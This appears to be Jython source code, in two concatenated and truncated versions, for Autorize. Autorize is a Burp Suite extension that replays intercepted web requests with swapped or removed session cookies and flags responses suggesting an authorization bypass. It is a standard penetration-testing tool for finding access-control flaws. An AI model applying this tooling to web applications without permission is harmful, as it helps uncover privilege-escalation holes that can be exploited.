enforcementStatusFilter == "All Statuses": htmlContent += "<tr bgcolor=\"%s\"><td><a href=\"%s\">%s</a></td><td>%s</td></tr>" % ( color, self._log.get(i)._url, self._log.get(i)._url, self._log.get(i)._enfocementStatus) else: if enforcementStatusFilter == self._log.get( i)._enfocementStatus: htmlContent += "<tr bgcolor=\"%s\"><td><a href=\"%s\">%s</a></td><td>%s</td></tr>" % ( color, self._log.get(i)._url, self._log.get(i)._url, self._log.get(i)._enfocementStatus) htmlContent += "</tbody></table></div></body></html>" f = open(fileToSave.getAbsolutePath(), 'w') f.writelines(htmlContent) f.close() # # implement IContextMenuFactory # def createMenuItems(self, invocation): responses = invocation.getSelectedMessages() if responses > 0: ret = LinkedList() requestMenuItem = JMenuItem("Send request to Autorize") cookieMenuItem = JMenuItem("Send cookie to Autorize") requestMenuItem.addActionListener( handleMenuItems(self, responses[0], "request")) cookieMenuItem.addActionListener( handleMenuItems(self, responses[0], "cookie")) ret.add(requestMenuItem) ret.add(cookieMenuItem) return (ret) return null # # implement ITab # def getTabCaption(self): return "Autorize" def getUiComponent(self): return self._splitpane # # extend AbstractTableModel # def getRowCount(self): try: return self._log.size() except: return 0 def getColumnCount(self): return 2 def getColumnName(self, columnIndex): if columnIndex == 0: return "URL" if columnIndex == 1: return "Authorization Enforcement Status" return "" def getValueAt(self, rowIndex, columnIndex): logEntry = self._log.get(rowIndex) if columnIndex == 0: return logEntry._url.toString() if columnIndex == 1: return logEntry._enfocementStatus return "" # # implement IMessageEditorController # this allows our request/response viewers to obtain details about the messages being displayed # def getHttpService(self): return self._currentlyDisplayedItem.getHttpService() def getRequest(self): return self._currentlyDisplayedItem.getRequest() def getResponse(self): return self._currentlyDisplayedItem.getResponse() # # implement IHttpListener # def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo): if self.intercept == 1: if self.prevent304.isSelected(): if messageIsRequest: requestHeaders = list( self._helpers.analyzeRequest(messageInfo).getHeaders()) newHeaders = list() found = 0 for header in requestHeaders: if not "If-None-Match:" in header and not "If-Modified-Since:" in header: newHeaders.append(header) found = 1 if found == 1: requestInfo = self._helpers.analyzeRequest(messageInfo) bodyBytes = messageInfo.getRequest()[requestInfo. getBodyOffset():] bodyStr = self._helpers.bytesToString(bodyBytes) messageInfo.setRequest( self._helpers.buildHttpMessage( newHeaders, bodyStr)) if not messageIsRequest: if not self.replaceString.getText( ) in self._helpers.analyzeRequest(messageInfo).getHeaders(): if self.ignore304.isSelected(): firstHeader = self._helpers.analyzeResponse( messageInfo.getResponse()).getHeaders()[0] if "304" in firstHeader or "204" in firstHeader: return if self.IFList.getModel().getSize() == 0: self.checkAuthorization( messageInfo, self._helpers.analyzeResponse( messageInfo.getResponse()).getHeaders()) else: urlString = str( self._helpers.analyzeRequest(messageInfo).getUrl()) for i in range(0, self.IFList.getModel().getSize()): if self.IFList.getModel().getElementAt(i).split( ":")[0] == "Scope items only": currentURL = URL(urlString) if self._callbacks.isInScope(currentURL): self.checkAuthorization( messageInfo, self._helpers.analyzeResponse( messageInfo.getResponse()). getHeaders()) if self.IFList.getModel().getElementAt(i).split( ":")[0] == "URL Contains": if self.IFList.getModel().getElementAt( i)[14:] in urlString: self.checkAuthorization( messageInfo, self._helpers.analyzeResponse( messageInfo.getResponse()). getHeaders()) return def makeRequest(self, messageInfo, message): requestURL = self._helpers.analyzeRequest(messageInfo).getUrl() return self._callbacks.makeHttpRequest( self._helpers.buildHttpService( str(requestURL.getHost()), int(requestURL.getPort()), requestURL.getProtocol() == "https"), message) def makeMessage(self, messageInfo, removeOrNot): requestInfo = self._helpers.analyzeRequest(messageInfo) headers = requestInfo.getHeaders() if removeOrNot: headers = list(headers) removeHeaders = ArrayList() removeHeaders.add(self.replaceString.getText() [0:self.replaceString.getText().index(":")]) for header in headers[:]: for removeHeader in removeHeaders: if removeHeader in header: headers.remove(header) headers.append(self.replaceString.getText()) msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] return self._helpers.buildHttpMessage(headers, msgBody) def checkAuthorization(self, messageInfo, originalHeaders): message = self.makeMessage(messageInfo, True) requestResponse = self.makeRequest(messageInfo, message) analyzedResponse = self._helpers.analyzeResponse( requestResponse.getResponse()) oldStatusCode = originalHeaders[0] newStatusCode = analyzedResponse.getHeaders()[0] oldContentLen = self.getContentLength(originalHeaders) newContentLen = self.getContentLength(analyzedResponse.getHeaders()) impression = "" EDFilters = self.EDModel.toArray() if oldStatusCode == newStatusCode: if oldContentLen == newContentLen: impression = "Authorization bypass!" else: impression = "Authorization enforced??? (please configure enforcement detector)" for filter in EDFilters: if str(filter).startswith("Content-Length: "): if newContentLen == filter: impression = "Authorization enforced!" if str(filter).startswith("Finger Print: "): if filter[14:] in self._helpers.bytesToString( requestResponse.getResponse() [analyzedResponse.getBodyOffset():]): impression = "Authorization enforced!" else: impression = "Authorization enforced!" self._lock.acquire() row = self._log.size() self._log.add( LogEntry(self._callbacks.saveBuffersToTempFiles(requestResponse), self._helpers.analyzeRequest(requestResponse).getUrl(), messageInfo, impression)) # same requests not include again. self.fireTableRowsInserted(row, row) self._lock.release() def getContentLength(self, analyzedResponseHeaders): for header in analyzedResponseHeaders: if "Content-Length:" in header: return header return "null" def getCookieFromMessage(self, messageInfo): headers = list( self._helpers.analyzeRequest( messageInfo.getRequest()).getHeaders()) for header in headers: if "Cookie:" in header: return header return None
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel, IContextMenuFactory): def registerExtenderCallbacks(self, callbacks): # keep a reference to our callbacks object self._callbacks = callbacks # obtain an extension helpers object self._helpers = callbacks.getHelpers() # set our extension name callbacks.setExtensionName("Autorize") # create the log and a lock on which to synchronize when adding log entries self._log = ArrayList() self._lock = Lock() self._enfocementStatuses = ["Authorization bypass!","Authorization enforced??? (please configure enforcement detector)","Authorization enforced!"] self.intercept = 0 self.initInterceptionFilters() self.initEnforcementDetector() self.initEnforcementDetectorUnauthorized() self.initExport() self.initConfigurationTab() self.initTabs() self.initCallbacks() self.currentRequestNumber = 1 print "Thank you for installing Autorize v0.12 extension" print "Created by Barak Tawily" print "Contributors: Barak Tawily, Federico Dotta" print "\nGithub:\nhttps://github.com/Quitten/Autorize" return def initExport(self): # ## init enforcement detector tab # exportLType = JLabel("File Type:") exportLType.setBounds(10, 10, 100, 30) exportLES = JLabel("Enforcement Statuses:") exportLES.setBounds(10, 50, 160, 30) exportFileTypes = ["HTML","CSV"] self.exportType = JComboBox(exportFileTypes) self.exportType.setBounds(100, 10, 200, 30) exportES = ["All Statuses", self._enfocementStatuses[0], self._enfocementStatuses[1], self._enfocementStatuses[2]] self.exportES = JComboBox(exportES) self.exportES.setBounds(100, 50, 200, 30) exportLES = JLabel("Statuses:") exportLES.setBounds(10, 50, 100, 30) self.exportButton = JButton("Export",actionPerformed=self.export) self.exportButton.setBounds(390, 25, 100, 30) self.exportPnl = JPanel() self.exportPnl.setLayout(None); self.exportPnl.setBounds(0, 0, 1000, 1000); self.exportPnl.add(exportLType) self.exportPnl.add(self.exportType) self.exportPnl.add(exportLES) self.exportPnl.add(self.exportES) self.exportPnl.add(self.exportButton) def initEnforcementDetector(self): # ## init enforcement detector tab # # These two variable appears to be unused... self.EDFP = ArrayList() self.EDCT = ArrayList() EDLType = JLabel("Type:") EDLType.setBounds(10, 10, 140, 30) EDLContent = JLabel("Content:") EDLContent.setBounds(10, 50, 140, 30) EDLabelList = JLabel("Filter List:") EDLabelList.setBounds(10, 165, 140, 30) EDStrings = ["Headers (simple string): (enforced message headers contains)", "Headers (regex): (enforced messege headers contains)", "Body (simple string): (enforced messege body contains)", "Body (regex): (enforced messege body contains)", "Full request (simple string): (enforced messege contains)", "Full request (regex): (enforced messege contains)", "Content-Length: (constant Content-Length number of enforced response)"] self.EDType = JComboBox(EDStrings) self.EDType.setBounds(80, 10, 430, 30) self.EDText = JTextArea("", 5, 30) self.EDText.setBounds(80, 50, 300, 110) self.EDModel = DefaultListModel(); self.EDList = JList(self.EDModel); self.EDList.setBounds(80, 175, 300, 110) self.EDList.setBorder(LineBorder(Color.BLACK)) self.EDAdd = JButton("Add filter",actionPerformed=self.addEDFilter) self.EDAdd.setBounds(390, 85, 120, 30) self.EDDel = JButton("Remove filter",actionPerformed=self.delEDFilter) self.EDDel.setBounds(390, 210, 120, 30) self.EDPnl = JPanel() self.EDPnl.setLayout(None); self.EDPnl.setBounds(0, 0, 1000, 1000); self.EDPnl.add(EDLType) self.EDPnl.add(self.EDType) self.EDPnl.add(EDLContent) self.EDPnl.add(self.EDText) self.EDPnl.add(self.EDAdd) self.EDPnl.add(self.EDDel) self.EDPnl.add(EDLabelList) self.EDPnl.add(self.EDList) def initEnforcementDetectorUnauthorized(self): # ## init enforcement detector tab # EDLType = JLabel("Type:") EDLType.setBounds(10, 10, 140, 30) EDLContent = JLabel("Content:") EDLContent.setBounds(10, 50, 140, 30) EDLabelList = JLabel("Filter List:") EDLabelList.setBounds(10, 165, 140, 30) EDStrings = ["Headers (simple string): (enforced message headers contains)", "Headers (regex): (enforced messege headers contains)", "Body (simple string): (enforced messege body contains)", "Body (regex): (enforced messege body contains)", "Full request (simple string): (enforced messege contains)", "Full request (regex): (enforced messege contains)", "Content-Length: (constant Content-Length number of enforced response)"] self.EDTypeUnauth = JComboBox(EDStrings) self.EDTypeUnauth.setBounds(80, 10, 430, 30) self.EDTextUnauth = JTextArea("", 5, 30) self.EDTextUnauth.setBounds(80, 50, 300, 110) self.EDModelUnauth = DefaultListModel(); self.EDListUnauth = JList(self.EDModelUnauth); self.EDListUnauth.setBounds(80, 175, 300, 110) self.EDListUnauth.setBorder(LineBorder(Color.BLACK)) self.EDAddUnauth = JButton("Add filter",actionPerformed=self.addEDFilterUnauth) self.EDAddUnauth.setBounds(390, 85, 120, 30) self.EDDelUnauth = JButton("Remove filter",actionPerformed=self.delEDFilterUnauth) self.EDDelUnauth.setBounds(390, 210, 120, 30) self.EDPnlUnauth = JPanel() self.EDPnlUnauth.setLayout(None); self.EDPnlUnauth.setBounds(0, 0, 1000, 1000); self.EDPnlUnauth.add(EDLType) self.EDPnlUnauth.add(self.EDTypeUnauth) self.EDPnlUnauth.add(EDLContent) self.EDPnlUnauth.add(self.EDTextUnauth) self.EDPnlUnauth.add(self.EDAddUnauth) self.EDPnlUnauth.add(self.EDDelUnauth) self.EDPnlUnauth.add(EDLabelList) self.EDPnlUnauth.add(self.EDListUnauth) def initInterceptionFilters(self): # ## init interception filters tab # IFStrings = ["Scope items only: (Content is not required)","URL Contains (simple string): ","URL Contains (regex): ","URL Not Contains (simple string): ","URL Not Contains (regex): "] self.IFType = JComboBox(IFStrings) self.IFType.setBounds(80, 10, 430, 30) self.IFModel = DefaultListModel(); self.IFList = JList(self.IFModel); self.IFList.setBounds(80, 175, 300, 110) self.IFList.setBorder(LineBorder(Color.BLACK)) self.IFText = JTextArea("", 5, 30) self.IFText.setBounds(80, 50, 300, 110) IFLType = JLabel("Type:") IFLType.setBounds(10, 10, 140, 30) IFLContent = JLabel("Content:") IFLContent.setBounds(10, 50, 140, 30) IFLabelList = JLabel("Filter List:") IFLabelList.setBounds(10, 165, 140, 30) self.IFAdd = JButton("Add filter",actionPerformed=self.addIFFilter) self.IFAdd.setBounds(390, 85, 120, 30) self.IFDel = JButton("Remove filter",actionPerformed=self.delIFFilter) self.IFDel.setBounds(390, 210, 120, 30) self.filtersPnl = JPanel() self.filtersPnl.setLayout(None); self.filtersPnl.setBounds(0, 0, 1000, 1000); self.filtersPnl.add(IFLType) self.filtersPnl.add(self.IFType) self.filtersPnl.add(IFLContent) self.filtersPnl.add(self.IFText) self.filtersPnl.add(self.IFAdd) self.filtersPnl.add(self.IFDel) self.filtersPnl.add(IFLabelList) self.filtersPnl.add(self.IFList) def initConfigurationTab(self): # ## init configuration tab # self.prevent304 = JCheckBox("Prevent 304 Not Modified status code") self.prevent304.setBounds(290, 25, 300, 30) self.ignore304 = JCheckBox("Ignore 304/204 status code responses") self.ignore304.setBounds(290, 5, 300, 30) self.ignore304.setSelected(True) self.autoScroll = JCheckBox("Auto Scroll") #self.autoScroll.setBounds(290, 45, 140, 30) self.autoScroll.setBounds(160, 40, 140, 30) self.doUnauthorizedRequest = JCheckBox("Check unauthenticated") self.doUnauthorizedRequest.setBounds(290, 45, 300, 30) self.doUnauthorizedRequest.setSelected(True) startLabel = JLabel("Authorization checks:") startLabel.setBounds(10, 10, 140, 30) self.startButton = JButton("Autorize is off",actionPerformed=self.startOrStop) self.startButton.setBounds(160, 10, 120, 30) self.startButton.setBackground(Color(255, 100, 91, 255)) self.clearButton = JButton("Clear List",actionPerformed=self.clearList) self.clearButton.setBounds(10, 40, 100, 30) self.replaceString = JTextArea("Cookie: Insert=injected; header=here;", 5, 30) self.replaceString.setWrapStyleWord(True); self.replaceString.setLineWrap(True) self.replaceString.setBounds(10, 80, 470, 180) self.filtersTabs = JTabbedPane() self.filtersTabs.addTab("Enforcement Detector", self.EDPnl) self.filtersTabs.addTab("Detector Unauthenticated", self.EDPnlUnauth) self.filtersTabs.addTab("Interception Filters", self.filtersPnl) self.filtersTabs.addTab("Export", self.exportPnl) self.filtersTabs.setBounds(0, 280, 2000, 700) self.pnl = JPanel() self.pnl.setBounds(0, 0, 1000, 1000); self.pnl.setLayout(None); self.pnl.add(self.startButton) self.pnl.add(self.clearButton) self.pnl.add(self.replaceString) self.pnl.add(startLabel) self.pnl.add(self.autoScroll) self.pnl.add(self.ignore304) self.pnl.add(self.prevent304) self.pnl.add(self.doUnauthorizedRequest) self.pnl.add(self.filtersTabs) def initTabs(self): # ## init autorize tabs # self.logTable = Table(self) self.logTable.setAutoCreateRowSorter(True) tableWidth = self.logTable.getPreferredSize().width self.logTable.getColumn("ID").setPreferredWidth(Math.round(tableWidth / 50 * 2)) self.logTable.getColumn("URL").setPreferredWidth(Math.round(tableWidth / 50 * 24)) self.logTable.getColumn("Orig. Length").setPreferredWidth(Math.round(tableWidth / 50 * 4)) self.logTable.getColumn("Modif. Length").setPreferredWidth(Math.round(tableWidth / 50 * 4)) self.logTable.getColumn("Unauth. Length").setPreferredWidth(Math.round(tableWidth / 50 * 4)) self.logTable.getColumn("Authorization Enforcement Status").setPreferredWidth(Math.round(tableWidth / 50 * 4)) self.logTable.getColumn("Authorization Unauth. Status").setPreferredWidth(Math.round(tableWidth / 50 * 4)) self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT) self._splitpane.setResizeWeight(1) self.scrollPane = JScrollPane(self.logTable) self._splitpane.setLeftComponent(self.scrollPane) self.scrollPane.getVerticalScrollBar().addAdjustmentListener(autoScrollListener(self)) self.menuES0 = JCheckBoxMenuItem(self._enfocementStatuses[0],True) self.menuES1 = JCheckBoxMenuItem(self._enfocementStatuses[1],True) self.menuES2 = JCheckBoxMenuItem(self._enfocementStatuses[2],True) self.menuES0.addItemListener(menuTableFilter(self)) self.menuES1.addItemListener(menuTableFilter(self)) self.menuES2.addItemListener(menuTableFilter(self)) copyURLitem = JMenuItem("Copy URL"); copyURLitem.addActionListener(copySelectedURL(self)) self.menu = JPopupMenu("Popup") self.menu.add(copyURLitem) self.menu.add(self.menuES0) self.menu.add(self.menuES1) self.menu.add(self.menuES2) self.tabs = JTabbedPane() self._requestViewer = self._callbacks.createMessageEditor(self, False) self._responseViewer = self._callbacks.createMessageEditor(self, False) self._originalrequestViewer = self._callbacks.createMessageEditor(self, False) self._originalresponseViewer = self._callbacks.createMessageEditor(self, False) self._unauthorizedrequestViewer = self._callbacks.createMessageEditor(self, False) self._unauthorizedresponseViewer = self._callbacks.createMessageEditor(self, False) self.tabs.addTab("Modified Request", self._requestViewer.getComponent()) self.tabs.addTab("Modified Response", self._responseViewer.getComponent()) self.tabs.addTab("Original Request", self._originalrequestViewer.getComponent()) self.tabs.addTab("Original Response", self._originalresponseViewer.getComponent()) self.tabs.addTab("Unauthenticated Request", self._unauthorizedrequestViewer.getComponent()) self.tabs.addTab("Unauthenticated Response", self._unauthorizedresponseViewer.getComponent()) self.tabs.addTab("Configuration", self.pnl) self.tabs.setSelectedIndex(6) self._splitpane.setRightComponent(self.tabs) def initCallbacks(self): # ## init callbacks # # customize our UI components self._callbacks.customizeUiComponent(self._splitpane) self._callbacks.customizeUiComponent(self.logTable) self._callbacks.customizeUiComponent(self.scrollPane) self._callbacks.customizeUiComponent(self.tabs) self._callbacks.customizeUiComponent(self.filtersTabs) self._callbacks.registerContextMenuFactory(self) # add the custom tab to Burp's UI self._callbacks.addSuiteTab(self) # ## Events functions # def startOrStop(self, event): if self.startButton.getText() == "Autorize is off": self.startButton.setText("Autorize is on") self.startButton.setBackground(Color.GREEN) self.intercept = 1 self._callbacks.registerHttpListener(self) else: self.startButton.setText("Autorize is off") self.startButton.setBackground(Color(255, 100, 91, 255)) self.intercept = 0 self._callbacks.removeHttpListener(self) def addEDFilter(self, event): typeName = self.EDType.getSelectedItem().split(":")[0] self.EDModel.addElement(typeName + ": " + self.EDText.getText()) def delEDFilter(self, event): index = self.EDList.getSelectedIndex(); if not index == -1: self.EDModel.remove(index); def addEDFilterUnauth(self, event): typeName = self.EDTypeUnauth.getSelectedItem().split(":")[0] self.EDModelUnauth.addElement(typeName + ": " + self.EDTextUnauth.getText()) def delEDFilterUnauth(self, event): index = self.EDListUnauth.getSelectedIndex(); if not index == -1: self.EDModelUnauth.remove(index); def addIFFilter(self, event): typeName = self.IFType.getSelectedItem().split(":")[0] self.IFModel.addElement(typeName + ": " + self.IFText.getText()) def delIFFilter(self, event): index = self.IFList.getSelectedIndex(); if not index == -1: self.IFModel.remove(index); def clearList(self, event): self._lock.acquire() oldSize = self._log.size() self._log.clear() self.fireTableRowsDeleted(0, oldSize - 1) self._lock.release() def export(self, event): if self.exportType.getSelectedItem() == "HTML": self.exportToHTML() else: self.exportToCSV() def exportToCSV(self): parentFrame = JFrame() fileChooser = JFileChooser() fileChooser.setSelectedFile(File("AutorizeReprort.csv")); fileChooser.setDialogTitle("Save Autorize Report") userSelection = fileChooser.showSaveDialog(parentFrame) if userSelection == JFileChooser.APPROVE_OPTION: fileToSave = fileChooser.getSelectedFile() enforcementStatusFilter = self.exportES.getSelectedItem() csvContent = "id\tURL\tOriginal length\tModified length\tUnauthorized length\tAuthorization Enforcement Status\tAuthorization Unauthenticated Status\n" for i in range(0,self._log.size()): if enforcementStatusFilter == "All Statuses": csvContent += "%d\t%s\t%d\t%d\t%d\t%s\t%s\n" % (self._log.get(i)._id,self._log.get(i)._url, len(self._log.get(i)._originalrequestResponse.getResponse()) if self._log.get(i)._originalrequestResponse != None else 0, len(self._log.get(i)._requestResponse.getResponse()) if self._log.get(i)._requestResponse != None else 0, len(self._log.get(i)._unauthorizedRequestResponse.getResponse()) if self._log.get(i)._unauthorizedRequestResponse != None else 0, self._log.get(i)._enfocementStatus, self._log.get(i)._enfocementStatusUnauthorized) else: if (enforcementStatusFilter == self._log.get(i)._enfocementStatus) or (enforcementStatusFilter == self._log.get(i)._enfocementStatusUnauthorized): csvContent += "%d\t%s\t%d\t%d\t%d\t%s\t%s\n" % (self._log.get(i)._id,self._log.get(i)._url, len(self._log.get(i)._originalrequestResponse.getResponse()) if self._log.get(i)._originalrequestResponse != None else 0, len(self._log.get(i)._requestResponse.getResponse()) if self._log.get(i)._requestResponse != None else 0, len(self._log.get(i)._unauthorizedRequestResponse.getResponse()) if self._log.get(i)._unauthorizedRequestResponse != None else 0, self._log.get(i)._enfocementStatus, self._log.get(i)._enfocementStatusUnauthorized) f = open(fileToSave.getAbsolutePath(), 'w') f.writelines(csvContent) f.close() def exportToHTML(self): parentFrame = JFrame() fileChooser = JFileChooser() fileChooser.setSelectedFile(File("AutorizeReprort.html")); fileChooser.setDialogTitle("Save Autorize Report") userSelection = fileChooser.showSaveDialog(parentFrame) if userSelection == JFileChooser.APPROVE_OPTION: fileToSave = fileChooser.getSelectedFile() enforcementStatusFilter = self.exportES.getSelectedItem() htmlContent = """<html><title>Autorize Report by Barak Tawily</title> <style> .datagrid table { border-collapse: collapse; text-align: left; width: 100%; } .datagrid {font: normal 12px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #006699; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .datagrid table td, .datagrid table th { padding: 3px 10px; } .datagrid table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; color:#FFFFFF; font-size: 15px; font-weight: bold; border-left: 1px solid #0070A8; } .datagrid table thead th:first-child { border: none; }.datagrid table tbody td { color: #00496B; border-left: 1px solid #E1EEF4;font-size: 12px;font-weight: normal; }.datagrid table tbody .alt td { background: #E1EEF4; color: #00496B; }.datagrid table tbody td:first-child { border-left: none; }.datagrid table tbody tr:last-child td { border-bottom: none; }.datagrid table tfoot td div { border-top: 1px solid #006699;background: #E1EEF4;} .datagrid table tfoot td { padding: 0; font-size: 12px } .datagrid table tfoot td div{ padding: 2px; }.datagrid table tfoot td ul { margin: 0; padding:0; list-style: none; text-align: right; }.datagrid table tfoot li { display: inline; }.datagrid table tfoot li a { text-decoration: none; display: inline-block; padding: 2px 8px; margin: 1px;color: #FFFFFF;border: 1px solid #006699;-webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; }.datagrid table tfoot ul.active, .datagrid table tfoot ul a:hover { text-decoration: none;border-color: #006699; color: #FFFFFF; background: none; background-color:#00557F;}div.dhtmlx_window_active, div.dhx_modal_cover_dv { position: fixed !important; } table { width: 100%; table-layout: fixed; } td { border: 1px solid #35f; overflow: hidden; text-overflow: ellipsis; } td.a { width: 13%; white-space: nowrap; } td.b { width: 9%; word-wrap: break-word; } </style> <body> <h1>Autorize Report<h1> <div class="datagrid"><table> <thead><tr><th width=\"3%\">ID</th><th width=\"48%\">URL</th><th width=\"9%\">Original length</th><th width=\"9%\">Modified length</th><th width=\"9%\">Unauthorized length</th><th width=\"11%\">Authorization Enforcement Status</th><th width=\"11%\">Authorization Unauthenticated Status</th></tr></thead> <tbody>""" for i in range(0,self._log.size()): color_modified = "" if self._log.get(i)._enfocementStatus == self._enfocementStatuses[0]: color_modified = "red" if self._log.get(i)._enfocementStatus == self._enfocementStatuses[1]: color_modified = "yellow" if self._log.get(i)._enfocementStatus == self._enfocementStatuses[2]: color_modified = "LawnGreen" color_unauthorized = "" if self._log.get(i)._enfocementStatusUnauthorized == self._enfocementStatuses[0]: color_unauthorized = "red" if self._log.get(i)._enfocementStatusUnauthorized == self._enfocementStatuses[1]: color_unauthorized = "yellow" if self._log.get(i)._enfocementStatusUnauthorized == self._enfocementStatuses[2]: color_unauthorized = "LawnGreen" if enforcementStatusFilter == "All Statuses": htmlContent += "<tr><td>%d</td><td><a href=\"%s\">%s</a></td><td>%d</td><td>%d</td><td>%d</td><td bgcolor=\"%s\">%s</td><td bgcolor=\"%s\">%s</td></tr>" % (self._log.get(i)._id,self._log.get(i)._url,self._log.get(i)._url, len(self._log.get(i)._originalrequestResponse.getResponse()) if self._log.get(i)._originalrequestResponse != None else 0, len(self._log.get(i)._requestResponse.getResponse()) if self._log.get(i)._requestResponse != None else 0, len(self._log.get(i)._unauthorizedRequestResponse.getResponse()) if self._log.get(i)._unauthorizedRequestResponse != None else 0, color_modified, self._log.get(i)._enfocementStatus, color_unauthorized, self._log.get(i)._enfocementStatusUnauthorized) else: if (enforcementStatusFilter == self._log.get(i)._enfocementStatus) or (enforcementStatusFilter == self._log.get(i)._enfocementStatusUnauthorized): htmlContent += "<tr><td>%d</td><td><a href=\"%s\">%s</a></td><td>%d</td><td>%d</td><td>%d</td><td bgcolor=\"%s\">%s</td><td bgcolor=\"%s\">%s</td></tr>" % (self._log.get(i)._id,self._log.get(i)._url,self._log.get(i)._url, len(self._log.get(i)._originalrequestResponse.getResponse()) if self._log.get(i)._originalrequestResponse != None else 0, len(self._log.get(i)._requestResponse.getResponse()) if self._log.get(i)._requestResponse != None else 0, len(self._log.get(i)._unauthorizedRequestResponse.getResponse()) if self._log.get(i)._unauthorizedRequestResponse != None else 0, color_modified, self._log.get(i)._enfocementStatus, color_unauthorized, self._log.get(i)._enfocementStatusUnauthorized) htmlContent += "</tbody></table></div></body></html>" f = open(fileToSave.getAbsolutePath(), 'w') f.writelines(htmlContent) f.close() # # implement IContextMenuFactory # def createMenuItems(self, invocation): responses = invocation.getSelectedMessages(); if responses > 0: ret = LinkedList() requestMenuItem = JMenuItem("Send request to Autorize"); cookieMenuItem = JMenuItem("Send cookie to Autorize"); requestMenuItem.addActionListener(handleMenuItems(self,responses[0], "request")) cookieMenuItem.addActionListener(handleMenuItems(self, responses[0], "cookie")) ret.add(requestMenuItem); ret.add(cookieMenuItem); return(ret); return null; # # implement ITab # def getTabCaption(self): return "Autorize" def getUiComponent(self): return self._splitpane # # extend AbstractTableModel # def getRowCount(self): try: return self._log.size() except: return 0 def getColumnCount(self): return 7 def getColumnName(self, columnIndex): if columnIndex == 0: return "ID" if columnIndex == 1: return "URL" if columnIndex == 2: return "Orig. Length" if columnIndex == 3: return "Modif. Length" if columnIndex == 4: return "Unauth. Length" if columnIndex == 5: return "Authorization Enforcement Status" if columnIndex == 6: return "Authorization Unauth. Status" return "" def getColumnClass(self, columnIndex): if columnIndex == 0: return Integer if columnIndex == 1: return String if columnIndex == 2: return Integer if columnIndex == 3: return Integer if columnIndex == 4: return Integer if columnIndex == 5: return String if columnIndex == 6: return String return String def getValueAt(self, rowIndex, columnIndex): logEntry = self._log.get(rowIndex) if columnIndex == 0: return logEntry._id if columnIndex == 1: return logEntry._url.toString() if columnIndex == 2: return len(logEntry._originalrequestResponse.getResponse()) if columnIndex == 3: return len(logEntry._requestResponse.getResponse()) if columnIndex == 4: if logEntry._unauthorizedRequestResponse != None: return len(logEntry._unauthorizedRequestResponse.getResponse()) else: #return "-" return 0 if columnIndex == 5: return logEntry._enfocementStatus if columnIndex == 6: return logEntry._enfocementStatusUnauthorized return "" # # implement IMessageEditorController # this allows our request/response viewers to obtain details about the messages being displayed # def getHttpService(self): return self._currentlyDisplayedItem.getHttpService() def getRequest(self): return self._currentlyDisplayedItem.getRequest() def getResponse(self): return self._currentlyDisplayedItem.getResponse() # # implement IHttpListener # def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo): #if (self.intercept == 1) and (toolFlag != self._callbacks.TOOL_EXTENDER): if (self.intercept == 1) and (toolFlag == self._callbacks.TOOL_PROXY): if self.prevent304.isSelected(): if messageIsRequest: requestHeaders = list(self._helpers.analyzeRequest(messageInfo).getHeaders()) newHeaders = list() found = 0 for header in requestHeaders: if not "If-None-Match:" in header and not "If-Modified-Since:" in header: newHeaders.append(header) found = 1 if found == 1: requestInfo = self._helpers.analyzeRequest(messageInfo) bodyBytes = messageInfo.getRequest()[requestInfo.getBodyOffset():] bodyStr = self._helpers.bytesToString(bodyBytes) messageInfo.setRequest(self._helpers.buildHttpMessage(newHeaders, bodyStr)) if not messageIsRequest: if not self.replaceString.getText() in self._helpers.analyzeRequest(messageInfo).getHeaders(): if self.ignore304.isSelected(): firstHeader = self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders()[0] if "304" in firstHeader or "204" in firstHeader: return if self.IFList.getModel().getSize() == 0: self.checkAuthorization(messageInfo,self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected()) else: urlString = str(self._helpers.analyzeRequest(messageInfo).getUrl()) do_the_check = 1 for i in range(0,self.IFList.getModel().getSize()): if self.IFList.getModel().getElementAt(i).split(":")[0] == "Scope items only": currentURL = URL(urlString) if not self._callbacks.isInScope(currentURL): do_the_check = 0 if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Contains (simple string)": if self.IFList.getModel().getElementAt(i)[30:] not in urlString: do_the_check = 0 if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Contains (regex)": regex_string = self.IFList.getModel().getElementAt(i)[22:] p = re.compile(regex_string, re.IGNORECASE) if not p.search(urlString): do_the_check = 0 if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Not Contains (simple string)": if self.IFList.getModel().getElementAt(i)[34:] in urlString: do_the_check = 0 if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Not Contains (regex)": regex_string = self.IFList.getModel().getElementAt(i)[26:] p = re.compile(regex_string, re.IGNORECASE) if p.search(urlString): do_the_check = 0 if do_the_check: self.checkAuthorization(messageInfo,self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected()) return def sendRequestToAutorizeWork(self,messageInfo): if messageInfo.getResponse() == None: message = self.makeMessage(messageInfo,False,False) requestResponse = self.makeRequest(messageInfo, message) self.checkAuthorization(requestResponse,self._helpers.analyzeResponse(requestResponse.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected()) else: self.checkAuthorization(messageInfo,self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected()) def makeRequest(self, messageInfo, message): requestURL = self._helpers.analyzeRequest(messageInfo).getUrl() return self._callbacks.makeHttpRequest(self._helpers.buildHttpService(str(requestURL.getHost()), int(requestURL.getPort()), requestURL.getProtocol() == "https"), message) def makeMessage(self, messageInfo, removeOrNot, authorizeOrNot): requestInfo = 